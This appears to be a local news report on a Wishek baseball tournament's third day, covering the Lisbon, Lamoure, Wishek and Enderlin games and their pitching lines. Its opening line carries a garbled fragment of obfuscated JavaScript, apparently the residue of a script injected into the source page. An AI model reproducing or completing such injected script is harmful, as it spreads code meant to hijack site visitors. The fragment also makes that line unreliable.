WISHEK ykzzd|var|u0026u|referrer|ekktz||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- It was all about the pitching on Day 3 in Wishek. The first game between Lisbon and Lamoure set the tone.

Lisbon 2, Lamoure 1

Derek Lyons and Zach Stemen traded zero for zero for the first four innings, before Lamoure was able to push a run across against Lyons. Lamoure took a 1-0 lead into the 6th inning, when a two-out two-run single with the bases gave Lisbon their first lead.

Lyons came on in the 7th and mowed down Post 19 to preserve the 2-1 win sending Lisbon to Saturday’s championship series, where they will only have to win one of two games.

Lyons finished with a pretty impressive line 7IP, ER, 11K. Stemen took the tough luck loss for Lamoure throwing six strong innings, allowing just two runs while striking out seven.

Wishek 7, Enderlin 1

The first of two loser out contests feature the tournament’s host and the #4 seed. Mike Jacobson took the ball for Wishek and never looked back. He scattered five hits over seven innings while the Wishek lineup battered three different Enderlin pitchers.

Danny Sayler finished a home run shy of the cycle; 4-4, 3B, 2B, 2RBIs.

The win for Wishek sent them a second straight loser out game against Lamoure.

Lamoure 8, Wishek 4

This game started off rocky but it was Lamoure’s Danny Carlson who found his grove on the mound first to hold down Wishek. The teams traded 2-run innings in the first and second.

Wishek had seven hits in the first inning and a third, but just two more through the final five and two-thirds innings. Carlson retired 17 of the last 21 batters he faced, just two hits, an error and a hit batter after those first two innings.

Lamoure is already in the state tournament because they are the host city, but they will try to win the section Saturday in the championship series against Lisbon.
